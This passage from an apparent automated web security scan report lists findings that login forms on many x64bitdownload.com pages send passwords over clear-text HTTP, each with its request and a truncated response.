Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.236. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-games-entertainment-downloads-7-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.237. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-graphic-apps-downloads-8-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.238. http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-home-hobby-downloads-9-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-home-hobby-downloads-9-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%229%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.239. http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-multimedia-design-downloads-258-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-multimedia-design-downloads-258-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:36 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22258%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.240. http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-network-internet-downloads-10-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-network-internet-downloads-10-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:29:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:39:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2210%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79744


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.241. http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-security-privacy-downloads-11-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-security-privacy-downloads-11-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2211%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86135


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.242. http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-servers-downloads-12-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-servers-downloads-12-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:40:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2212%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.243. http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-system-utilities-downloads-13-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-system-utilities-downloads-13-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2213%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.244. http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-web-development-downloads-14-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-web-development-downloads-14-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:07 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2214%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.245. http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-widgets-downloads-304-0-d.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /categories/free-64-bit-widgets-downloads-304-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.246. http://www.x64bitdownload.com/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /contact.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.247. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:47 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.248. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.249. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.250. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.251. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53837


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.252. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.253. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.254. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.255. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
